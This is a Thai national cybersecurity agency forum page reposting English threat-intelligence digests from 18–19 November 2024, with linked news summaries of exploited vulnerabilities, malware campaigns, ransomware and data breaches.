สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 
ข้อมูลกลุ่ม
ส่วนตัว
administrators
รายชื่อสมาชิก
-
CISA เพิ่มช่องโหว่ของ Progress Kemp LoadMaster, Palo Alto Networks PAN-OS และ Expedition ลงในแคตตาล็อก (KEV)โพสต์ใน Cyber Security News
-
แรนซัมแวร์ Helldown โจมตีระบบ Linux และเซิร์ฟเวอร์ VMware สร้างความเสียหายอย่างมากโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand -
CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 1 ฉบับโพสต์ใน OT Cyber Security News
ybersecurity and Infrastructure Security Agency (CISA) CISA ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม(ICS) 1 รายการ เมื่อวันที่ 19 พฤศจิกายน 2567 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน คือ
- ICSA-24-324-01 Mitsubishi Electric MELSEC iQ-F Series
ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2024/11/19/cisa-releases-one-industrial-control-systems-advisory
-
ช่องโหว่ RCE ระดับ Critical ใน VMware vCenter Server ถูกใช้ในการโจมตีแล้วโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Akira แรนซัมแวร์สุดโหด ทำสถิติเหยื่อสูงสุดในหนึ่งวันกว่า 30 รายโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand -
Cyber Threat Intelligence 19 November 2024โพสต์ใน Cyber Security News
Industrial Sector
- Many US Water Systems Exposed To ‘high-Risk’ Vulnerabilities, Watchdog Finds
"Nearly 100 drinking water systems across the U.S. have “high-risk” vulnerabilities in the technology they use to serve millions of residents, according to a new report from a federal watchdog. The Environmental Protection Agency’s Office of Inspector General conducted a review of the agency’s cybersecurity initiatives, using an algorithm to rank issues at specific water utilities across the U.S. revolving around email security, IT hygiene, vulnerabilities, adversarial threats, and malicious activity."
https://therecord.media/us-water-systems-exposed-vulnerabilities
https://www.epaoig.gov/reports/other/management-implication-report-cybersecurity-concerns-related-drinking-water-systems
https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
https://hackread.com/cybersecurity-flaws-us-drinking-water-systems-risks/
New Tooling
- ScubaGear: Open-Source Tool To Assess Microsoft 365 Configurations For Security Gaps
"ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment."
https://www.helpnetsecurity.com/2024/11/18/scubagear-open-source-tool-assess-microsoft-365-security/
https://github.com/cisagov/ScubaGear
Vulnerabilities
- Critical RCE Bug In VMware vCenter Server Now Exploited In Attacks
"Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. TZL security researchers reported the RCE vulnerability (CVE-2024-38812) during China's 2024 Matrix Cup hacking contest. It is caused by a heap overflow weakness in the vCenter's DCE/RPC protocol implementation and affects products containing vCenter, including VMware vSphere and VMware Cloud Foundation."
https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/
https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html
https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/ - Palo Alto Networks Patches Two Firewall Zero-Days Used In Attacks
"Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). The first flaw, tracked as CVE-2024-0012, is an authentication bypass found in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges without requiring authentication or user interaction. The second one (CVE-2024-9474) is a PAN-OS privilege escalation security flaw that allows malicious PAN-OS administrators to perform actions on the firewall with root privileges."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-patches-two-firewall-zero-days-used-in-attacks/
https://www.darkreading.com/cyberattacks-data-breaches/palo-alto-networks-patches-critical-zero-day-bug-firewalls
https://www.securityweek.com/palo-alto-networks-releases-iocs-for-new-firewall-zero-day/
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/ - CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2024-1212 Progress Kemp LoadMaster OS Command Injection Vulnerability
CVE-2024-0012 Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
CVE-2024-9474 Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
Malware
- Distribution Of LummaC2 Infostealer Based On Legitimate Programs
"LummaC2 is an Infostealer actively being distributed while being disguised as illegal software such as cracks, and its distribution and creation methods are changing continuously. It has recently been distributed by being inserted into legitimate programs, so caution is needed."
https://asec.ahnlab.com/en/84556/ - Inside Water Barghest’s Rapid Exploit-To-Market Strategy For IoT Devices
"There is a big incentive for both espionage motivated actors and financially motivated actors to set up proxy botnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape contents of websites, access stolen or compromised online assets, and launch cyber-attacks. Examples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and Cyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018 and 2022, respectively."
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
https://www.bankinfosecurity.com/suspected-russian-hackers-infect-20000-iot-devices-a-26840 - Inside Bitdefender Labs’ Investigation Of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
"Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta’s social media platform Facebook. The campaign tricks users into installing a harmful browser extension under the guise of a security update."
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
https://www.bleepingcomputer.com/news/security/fake-bitwarden-ads-on-facebook-push-info-stealing-chrome-extension/
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/ - Microsoft 365 Admin Portal Abused To Send Sextortion Emails
"The Microsoft 365 Admin Portal is being abused to send sextortion emails, making the messages appear trustworthy and bypassing email security platforms. Sextortion emails are scams claiming that your computer or mobile device was hacked to steal images or videos of you performing sexual acts. The scammers then demand from you a payment of $500 to $5,000 to prevent them from sharing the compromising photos with your family and friends."
https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/ - Akira Ransomware Racks Up 30+ Victims In a Single Day
"Akira ransomware group has updated its data-leak website on Nov. 13-14, listing more than 30 of its latest victims — the highest single-day total since the gang first began its malicious operations in March of last year. The group spares no one, targeting a variety of industries globally, and operates using a ransomware-as-a-service (RaaS) model, stealing sensitive data before encrypting it."
https://www.darkreading.com/cyberattacks-data-breaches/akira-ransomware-30-victims-single-day
https://therecord.media/akira-ransomware-group-publishes-unprecedented-leak-data
https://drive.google.com/file/d/11ZjlJg2LDHAOwxFjUsqaZrK7Yg15IrAw/view - Government Agency Spoofing: DocuSign Attacks Exploit Government-Vendor Trust
"The latest wave of DocuSign attacks has taken a concerning turn, specifically targeting businesses that regularly interact with state, municipal, and licensing authorities. Since November 8 through November 14, we have observed a 98% increase in the use of DocuSign phishing URLs compared to all of September and October. In the last few days, our threat researchers are seeing hundreds of instances each day, many of which involve government impersonations. What’s more, the specific tactics employed in these attacks are evolving on a daily basis. Contact us for more information about DocuSign attack metrics."
https://slashnext.com/blog/government-docusign-impersonation-attacks/
https://hackread.com/us-govt-agencies-impersonate-docusign-phishing-scams/ - Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape
"Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever. Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer."
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/ - QuickBooks Popup Scam Still Being Delivered Via Google Ads
"Accounting software QuickBooks, by Intuit, is a popular target for India-based scammers, only rivaled for top spot by the classic Microsoft tech support scams. We’ve seen two main lures, both via Google ads: the first one is simply a website promoting online support for QuickBooks and shows a phone number, while the latter requires victims to download and install a program that will generate a popup, also showing a phone number. In both instances, that number is fraudulent."
https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads - Threat Brief: Operation Lunar Peek, Activity Related To CVE-2024-0012
"Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly."
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ - Exploit Attempts For Unpatched Citrix Vulnerability
"Last week, Watchtowr Labs released details describing a new and so far unpatched vulnerability in Citrix's remote access solution [1]. Specifically, the vulnerability affects the "Virtual Apps and Desktops." This solution allows "secure" remote access to desktop applications. It is commonly used for remote work, and I have seen it used in call center setups to isolate individual workstations from the actual desktop."
https://isc.sans.edu/diary/31446 - XLoader Executed Through JAR Signing Tool (jarsigner.exe)
"Recently, AhnLab SEcurity intelligence Center (ASEC) identified the distribution of XLoader malware using the DLL side-loading technique. The DLL side-loading attack technique saves a normal application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. The legitimate application used in the attack, jarsigner, is a file created during the installation of the IDE package distributed by the Eclipse Foundation. It is a tool for signing JAR (Java Archive) files."
https://asec.ahnlab.com/en/84574/
Breaches/Hacks/Leaks
- Library Of Congress Says An Adversary Hacked Some Emails
"The Library of Congress has notified lawmakers of a “cyber breach” of its IT system by an adversary, a hack of emails between some congressional offices and library staff, according to an email obtained by The Associated Press. The library said that an adversary accessed email communications during the period from January to September. The matter has been referred to law enforcement, the library said. Authorities gave no immediate information on the attacker, including whether their identity was known."
https://www.securityweek.com/library-of-congress-says-an-adversary-hacked-some-emails/
https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html - US Space Tech Giant Maxar Discloses Employee Data Breach
"Hackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. The threat actor compromised the company network about a week before the discovery of the intrusion. Immediately after discovering the unauthorized access, the company took action to prevent the hackers from reaching further into the system."
https://www.bleepingcomputer.com/news/security/us-space-tech-giant-maxar-discloses-employee-data-breach/ - Ransomware Attack On Oklahoma Medical Center Impacts 133,000
"Great Plains Regional Medical Center in Oklahoma is notifying over 133,000 individuals that their personal information was compromised in a ransomware attack. The public, not-for-profit healthcare system discovered the attack on September 8, 2024, when ransomware was deployed, but the attackers had access to its systems for at least three days prior. According to the medical center, the attackers accessed and encrypted certain files between September 5 and September 8, and exfiltrated information from its systems."
https://www.securityweek.com/ransomware-attack-on-oklahoma-medical-center-impacts-133000/ - Ford 'actively Investigating' After Employee Data Allegedly Parked On Leak Site
"Ford Motor Company says it is looking into allegations of a data breach after attackers claimed to have stolen an internal database containing 44,000 customer records and dumped the info on a cyber crime souk for anyone to "enjoy." "Ford is aware and is actively investigating the allegations that there has been a breach of Ford data," spokesperson Richard Binhammer told The Register. "Our investigation is active and ongoing." The erstwhile manufacturer of the Edsel declined to answer our questions about the possible compromise."
https://www.theregister.com/2024/11/18/ford_actively_investigating_breach/
General News
- Identity Fraud And The Cost Of Living Crisis: New Challenges For 2024
"Fraud is a rampant threat to individuals and organizations worldwide and across all sectors. In order to protect against the dangers of fraud in its many forms, it is vital to stay in the loop on the latest fraud trends and the threat landscape. The Fraudscape 2024 report from Cifas, the UK’s Fraud Prevention Community, is an effort to share this information to help prevent fraud. The report is compiled using data from Cifas’ National Fraud Database (NFD), Insider Threat Database (ITD), and intelligence from members, partners, and law enforcement agencies."
https://www.tripwire.com/state-of-security/identity-fraud-and-cost-living-crisis-new-challenges - Cyberbiosecurity: Where Digital Threats Meet Biological Systems
"Cyberbiosecurity has emerged as an essential area of interest as the boundaries between the digital and biological sectors continue to blur. With rapid advancements in areas such as artificial intelligence, automation, and synthetic biology, the need for strong cyberbiosecurity protections has grown to safeguard the bioeconomy. As biotechnology evolves, it creates a complex landscape where breaches can have consequences far beyond typical cyber risks. Cyberbiosecurity is about securing the foundation of our biological future."
https://www.tripwire.com/state-of-security/cyberbiosecurity-where-digital-threats-meet-biological-systems - Navigating The Compliance Labyrinth: A CSO’s Guide To Scaling Security
"Imagine navigating a labyrinth where the walls constantly shift, and the path ahead is obscured by fog. If this brings up a visceral image, you’ve either seen David Bowie’s iconic film or are very familiar with the real-world challenge of compliance in today’s fast-paced business environment."
https://www.helpnetsecurity.com/2024/11/18/cso-compliance-challenges/ - Transforming Code Scanning And Threat Detection With GenAI
"In this Help Net Security interview, Stuart McClure, CEO of Qwiet AI, discusses the evolution of code scanning practices, highlighting the shift from reactive fixes to proactive risk management. McClure also shares his perspective on the future of AI-driven code scanning, emphasizing the potential of machine learning in threat detection and remediation."
https://www.helpnetsecurity.com/2024/11/18/stuart-mcclure-qwiet-ai-code-scanning/ - UK Shoppers Lost £11.5m Last Christmas, NCSC Warns
"One of the UK’s leading cybersecurity agencies is urging the nation’s shoppers to stay safe online, after revealing that they lost over £11.5m ($14.5m) to fraudsters during last year’s festive period. Over recent years, the countdown to the busy Christmas shopping season has begun at around Black Friday, which falls this year on November 29, and lasts until early January. Yet new figures revealed today by the NCSC and Action Fraud note that scammers took an average of £695 from each of their online victims between November 2023 and January 2024."
https://www.infosecurity-magazine.com/news/ncsc-warns-uk-shoppers-lost-115m/ - US Charges Phobos Ransomware Admin After South Korea Extradition
"Evgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. Phobos is a long-running ransomware-as-a-service (RaaS) operation (derived from the Crysis ransomware family) widely distributed through many affiliates. Between May 2024 and November 2024, it accounted for roughly 11% of all submissions to the ID Ransomware service."
https://www.bleepingcomputer.com/news/security/us-charges-phobos-ransomware-admin-after-south-korea-extradition/
https://therecord.media/russian-national-in-custody-extradited
https://www.bankinfosecurity.com/accused-phobos-ransomware-hacker-in-us-custody-a-26839
https://cyberscoop.com/alleged-russian-phobos-ransomware-administrator-extradited-to-u-s-in-custody/ - Why The Demand For Cybersecurity Innovation Is Surging
"Companies have never faced a wider and more dynamic array of cyber threats than they do right now. From rapidly rising costs associated with data breaches and other cyberattacks to the exploitation of artificial intelligence (AI) to make attacks more effective than ever, the cyber-threat landscape is constantly evolving. This has led to a drastic increase in cybersecurity spending, as well as a wave of innovation in the sector."
https://www.darkreading.com/cyberattacks-data-breaches/why-demand-cybersecurity-innovation-is-surging - Why Custom IOCs Are Necessary For Advanced Threat Hunting And Detection
"The speed, precision, timeliness, and relevance of Cyber Threat Intelligence (CTI) is crucial for protecting digital infrastructures and driving proactive responses against emerging cybersecurity threats. To me, CTI is an ART: it has to be Actionable, Reliable, and Timely. One of the most critical components of CTI is indicators of compromise (IOCs). IOCs are crumbs of data or fingerprints (e.g., unusual IP addresses and web domains, unexpected network traffic, suspicious changes in file systems) left by adversaries in a previous cyberattack. This serves as invaluable clues to security professionals for detecting and tracing potential breaches or malicious activities in their own environments. Despite the on-paper benefits of IOCs, most cybersecurity professionals struggle to utilize them effectively."
https://www.securityweek.com/why-custom-iocs-are-necessary-for-advanced-threat-hunting-and-detection/ - DHS Releases Secure AI Framework For Critical Infrastructure
"The US Department of Homeland Security (DHS) has released recommendations that outline how to securely develop and deploy artificial intelligence (AI) in critical infrastructure. The recommendations apply to all players in the AI supply chain, starting with cloud and compute infrastructure providers, to AI developers, and all the way to critical infrastructure owners and operators. Recommendations for civil society and public-sector organizations are also provided. The voluntary recommendations in "Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure" look at each of the roles across five key areas: securing environments, driving responsible model and system design, implementing data governance, ensuring safe and secure deployment, and monitoring performance and impact. There are also technical and process recommendations to enhance the safety, security, and trustworthiness of AI systems."
https://www.darkreading.com/cloud-security/dhs-releases-secure-ai-framework-critical-infrastructure
อ้างอิง
Electronic Transactions Development Agency(ETDA)
- Many US Water Systems Exposed To ‘high-Risk’ Vulnerabilities, Watchdog Finds
-
Botnet ใช้ประโยชน์จากช่องโหว่ Zero-day ในอุปกรณ์ GeoVision ที่ EoLโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ช่องโหว่ร้ายแรงในปลั๊กอิน WordPress เว็บไซต์มากกว่า 4 ล้านเว็บ เสี่ยงต่อการถูกควบคุมจากระยะไกลโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 18 November 2024โพสต์ใน Cyber Security News
Vulnerabilities
- Botnet Exploits GeoVision Zero-Day To Install Mirai Malware
"A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. The flaw is tracked as CVE-2024-11120 and was discovered by Piort Kijewski of The Shadowserver Foundation. It is a critical severity (CVSS v3.1 score: 9.8) OS command injection problem, allowing unauthenticated attackers to execute arbitrary system commands on the device. "Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device," warns Taiwan's CERT."
https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html
https://securityaffairs.com/171067/malware/ddos-botnet-exploits-geovision-zero-day.html - Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
"It’s been a tricky time for Fortinet (and their customers) lately - arguably, even more so than usual. Adding to the steady flow of vulnerabilities in appliances recently was a nasty CVSS 9.8 vulnerability in FortiManager, their tool for central management of FortiGate appliances. As always, the opinions expressed in this blogpost are of the watchTowr team alone. If you don't enjoy our opinions, please scream into a paper bag."
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
https://www.infosecurity-magazine.com/news/watchtowr-new-vulnerability/ - Palo Alto Networks Warns Of Critical RCE Zero-Day Exploited In Attacks
"Palo Alto Networks is warning that a critical zero-day vulnerability on Next-Generation Firewalls (NGFW) management interfaces, currently tracked as 'PAN-SA-2024-0015,' is actively being exploited in attacks. The flaw was originally disclosed on November 8, 2024, with Palo Alto Networks warning customers to restrict access to their next-generation firewalls because of a "potential" remote code execution (RCE) vulnerability impacting them. No signs of exploitation were detected at that time, but now, one week later, the situation has changed."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-critical-rce-zero-day-exploited-in-attacks/
https://therecord.media/palo-alto-networks-firewall-vulnerability-exploited
https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
https://www.bankinfosecurity.com/palo-alto-reports-firewalls-exploited-using-unknown-flaw-a-26822
https://cyberscoop.com/palo-alto-expedition-firewall-exploit-cisa-kev/
https://www.infosecurity-magazine.com/news/palo-alto-confirms-new-0day/
https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/
https://www.theregister.com/2024/11/15/palo_alto_networks_firewall_zeroday/
https://securityaffairs.com/171057/hacking/palo-alto-networks-zero-day-exploitation.html
Malware
- Report On DDoSia Malware Launching DDoS Attacks Against Korean Institutions
"The Russian hacktivist group NoName057 (16) has been active since March 2022, and their goal is to launch DDoS attacks against targets with anti-Russian views. In November 2024, NoName05, along with the pro-Russian hacktivist groups Cyber Army of Russia Reborn and Alixsec, launched DDoS attacks against the websites of major South Korean government agencies. The attacks were believed to have been triggered by the remarks made by Minister of Foreign Affairs Cho Tae-yul and President Yoon Suk-yeol regarding the supply of weapons to Ukraine. As a result of these attacks, various South Korean organizations suffered damages."
https://asec.ahnlab.com/en/84531/ - BrazenBamboo Weaponizes FortiClient Vulnerability To Steal VPN Credentials Via DEEPDATA
"In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory."
https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/
https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html - Babble Babble Babble Babble Babble Babble BabbleLoader
"The pace of innovation and development in the malware detection market is relentless, the same goes for the development of malware itself. Constantly charging and adapting to create ever more evasive and capable payloads. One such sector of this market is the loader (also called crypter or packer) market. In today’s threat landscape, loaders have become a critical tool in cybercrime operations, serving as the backbone for delivering a range of malicious payloads. Loaders are often the first stage in an attack chain, designed to stealthily execute or inject malware, such as info-stealers or ransomware, into a target system."
https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/ - Thanos Operator Targets Police Department In United Arab Emirates
"The SonicWall Capture Labs threat research team has come across a variant of Thanos ransomware targeted at a police department in the United Arab Emirates (UAE). Thanos ransomware is a customizable and highly adaptable ransomware-as-a-service (RaaS) tool that allows cybercriminals to create and deploy ransomware tailored to their needs. It is known for its data-stealing capabilities, the ability to spread through networks and the use of advanced evasion techniques to avoid detection."
https://blog.sonicwall.com/en-us/2024/11/thanos-operator-targets-police-in-united-arab-emirates/ - Fake AI Video Generators Infect Windows, MacOS With Infostealers
"Fake AI image and video generators infect Windows and macOS with the Lumma Stealer and AMOS information-stealing malware, used to steal credentials and cryptocurrency wallets from infected devices. Lumma Stealer is a Windows malware and AMOS is for macOS, but both steal cryptocurrency wallets and cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. This data is collected into an archive and sent back to the attacker, where they can use the information in further attacks or sell it on cybercrime marketplaces."
https://www.bleepingcomputer.com/news/security/fake-ai-video-generators-infect-windows-macos-with-infostealers/ - GitHub Projects Targeted With Malicious Commits To Frame Researcher
"GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions."
https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/ - Phishing Emails Increasingly Use SVG Attachments To Evade Detection
"Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code."
https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/
Breaches/Hacks/Leaks
- Keyboard Robbers Steal 171K Customers' Data From AnnieMac Mortgage House
"A major US mortgage lender has told customers looking to make the biggest financial transaction of their lives that an intruder broke into its systems and saw data belonging to 171,000 of them. American Neighborhood Mortgage Acceptance Company, which trades as AnnieMac Home Mortgage, said between August 21 and 23, an unknown intruder "viewed and/or copied" some customer data."
https://www.theregister.com/2024/11/15/anniemac_data_breach/ - T-Mobile Confirms It Was Hacked In Recent Wave Of Telecom Breaches
"T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Wall Street Journal, which first reported about the breach. "We will continue to monitor this closely, working with industry peers and the relevant authorities.""
https://www.bleepingcomputer.com/news/security/t-mobile-confirms-it-was-hacked-in-recent-wave-of-telecom-breaches/
https://www.itnews.com.au/news/t-mobile-hacked-in-massive-chinese-breach-of-telecom-networks-613175
General News
- Bitfinex Hacker Gets 5 Years In Prison For 120,000 Bitcoin Heist
"A hacker responsible for stealing 119,754 Bitcoin in a 2016 hack on the Bitfinex cryptocurrency exchange was sentenced to five years in prison by U.S. authorities. The man, Ilya Lichtenstein, was arrested in February 2022 in Manhattan following a lengthy investigation led by the IRS, HSI, and the FBI, which managed to recover roughly 80% of the stolen cryptocurrency (94,000 Bitcoin)/ At the time of the theft, the 119,754 bitcoins were worth $78,000,000 but equaled $3.6 billion at the time of the seizure."
https://www.bleepingcomputer.com/news/security/bitfinex-hacker-gets-5-years-in-prison-for-120-000-bitcoin-heist/
https://thehackernews.com/2024/11/bitfinex-hacker-sentenced-to-5-years.html
https://www.bankinfosecurity.com/bitfinex-hacker-lichtenstein-sentenced-to-5-years-in-prison-a-26824
https://www.securityweek.com/man-who-stole-and-laundered-roughly-1b-in-bitcoin-is-sentenced-to-5-years-in-prison/
https://www.infosecurity-magazine.com/news/bitfinex-hacker-jailed-5-years/
https://securityaffairs.com/171029/cyber-crime/bitfinex-hacker-was-sentenced-to-5-years-in-prison.html
https://www.theregister.com/2024/11/15/bitfinix_intruder_sentenced/ - Threat Trend Report On Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums And Markets Of October 2024
"This trend report on the deep web and dark web of October 2024 is sectioned into Ransomware, Forums & Black Markets, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true."
https://asec.ahnlab.com/en/84530/ - Combating The Rise Of Federally Aimed Malicious Intent
"The public sector is facing a security crisis. The acceleration of deepfake videos, AI-generated threats, and nation-state cyberattacks has put the federal government under increasing pressure to protect its employees, agencies, and the general public. Last year, the FBI, the National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) released details on the "growing challenge" that deepfake threats present to a range of federal agencies."
https://www.darkreading.com/vulnerabilities-threats/combating-rise-federally-aimed-malicious-intent - Lessons From OSC&R On Protecting The Software Supply Chain
"The complexity of today's software development — a mix of open source and third-party components, as well as internally developed code — has resulted in an abundance of vulnerabilities for attackers to exploit throughout the software supply chain. We've seen the direct effects of software supply chain attacks in incidents like the MOVEit and SolarWinds breaches, revealing that no industry sector, size of company, or stage of software development is immune. According to a survey from Enterprise Strategy Group (ESG), 91% of organizations experienced at least one software supply chain security incident in 2023, and 2024 hasn't seemed any better."
https://www.darkreading.com/application-security/lessons-from-osc-r-on-protecting-the-software-supply-chain - AI’s Impact On The Future Of Web Application Security
"In this Help Net Security interview, Tony Perez, CEO at NOC.org, discusses the role of continuous monitoring for real-time threat detection, the unique risks posed by APIs, and strategies for securing web applications. Perez also addresses how AI-driven threats are shaping the future of web security and the need for adaptive defenses."
https://www.helpnetsecurity.com/2024/11/15/tony-perez-noc-org-web-application-security/ - Critical Vulnerabilities Persist In High-Risk Sectors
"Finance and insurance sectors found to have the highest number of critical vulnerabilities, according to Black Duck. The report, which analyzes data from over 200,000 dynamic application security testing (DAST) scans conducted by Black Duck on approximately 1,300 applications across 19 industry sectors from June 2023 to June 2024, found variations in vulnerability types and remediation practices."
https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/ - Cybersecurity Dominates Concerns Among The C-Suite, Small Businesses And The Nation
"Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data breach costs, it is no longer a question of whether cybersecurity matters but how deeply it affects every facet of modern operations."
https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/ - Indian Police Arrest Suspect In $230 Million WazirX Crypto Exchange Hack
"Delhi police have arrested a suspect allegedly linked to the theft of at least $230 million worth of cryptocurrency from the India-based platform WazirX earlier this year. The suspect, identified as Masud Alam from West Bengal, was detained on Thursday. The Indian newspaper Times of India described the arrest as “a significant breakthrough in the ongoing investigation” into the WazirX hack."
https://therecord.media/wazirx-crypto-exchange-hack-suspect-arrested-india - Letting Chatbots Run Robots Ends As Badly As You'd Expect
"Science fiction author Isaac Asimov proposed three laws of robotics, and you'd never know it from the behavior of today's robots or those making them. The first law, "A robot may not injure a human being or, through inaction, allow a human being to come to harm," while laudable, hasn't prevented 77 robot-related accidents between 2015-2022, many of which resulted in finger amputations and fractures to the head and torso. Nor has it prevented deaths attributed to car automation and robotaxis."
https://www.theregister.com/2024/11/16/chatbots_run_robots/
https://arobey1.github.io/writing/jailbreakingrobots.html - Will Passkeys Ever Replace Passwords? Can They?
